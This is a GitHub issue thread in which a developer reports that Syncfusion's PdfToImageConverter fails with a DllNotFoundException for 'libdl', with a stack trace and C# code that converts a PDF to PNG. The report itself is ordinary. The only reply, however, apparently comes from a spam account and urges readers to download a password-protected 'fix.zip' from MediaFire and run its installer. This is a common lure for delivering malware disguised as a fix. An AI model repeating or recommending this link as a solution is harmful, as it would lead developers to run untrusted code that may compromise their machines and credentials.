### ISSUE TITLE
ImagePreview -> Syncfusion.PdfToImageConverter.PdfiumNative' threw an exception.

### ISSUE THREAD

**Issue by william00771** [salt-community/diploma-maker#193]
Callstack:
Created MemoryStream for PDF. Stream length: 852925

System.TypeInitializationException: The type initializer for 'Syncfusion.PdfToImageConverter.PdfiumNative' threw an exception.
---> System.DllNotFoundException: Unable to load shared library 'libdl' or one of its dependencies. In order to help diagnose loading problems, consider using a tool like strace. If you're using glibc, consider setting the LD_DEBUG environment variable: 
/app/libdl.so: cannot open shared object file: No such file or directory
/app/liblibdl.so: cannot open shared object file: No such file or directory
/app/libdl: cannot open shared object file: No such file or directory
/app/liblibdl: cannot open shared object file: No such file or directory
at Syncfusion.PdfToImageConverter.PdfiumNative.dlopen(String fileName, Int32 flags)

 using (MemoryStream pdfStream = new MemoryStream(pdfBytes))
{
    _logger.LogInformation("Created MemoryStream for PDF. Stream length: {Length}", pdfStream.Length);

   	--------ERROR HAPPENS BELOW HERE---------

    PdfToImageConverter imageConverter = new PdfToImageConverter();

    imageConverter.Load(pdfStream);
    _logger.LogInformation("Loaded PDF into PdfToImageConverter.");

    using (Stream imageStream = imageConverter.Convert(0, false, false))
    {
        _logger.LogInformation("Converted PDF to image stream. Stream length: {Length}", imageStream.Length);
        imageStream.Position = 0;

        using (MemoryStream pngStream = new MemoryStream())
        {
            System.Drawing.Image image = System.Drawing.Image.FromStream(imageStream);
            _logger.LogInformation("Created image from stream.");

            image.Save(pngStream, System.Drawing.Imaging.ImageFormat.Png);
            _logger.LogInformation("Saved image as PNG to memory stream. Stream length: {Length}", pngStream.Length);
            pngStream.Position = 0;

            var pngFileStream = new MemoryStream(pngStream.ToArray());
            _logger.LogInformation("Copied PNG stream to new memory stream.");
            pngFileStream.Position = 0;

            IFormFile formFile = new FormFile(pngFileStream, 0, pngFileStream.Length, "image", fileName)
            {
                Headers = new HeaderDictionary(),
                ContentType = "image/png"
            };

            _logger.LogInformation("Created IFormFile object with name {FileName}.", fileName);

            return formFile;
        }
    }
}

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
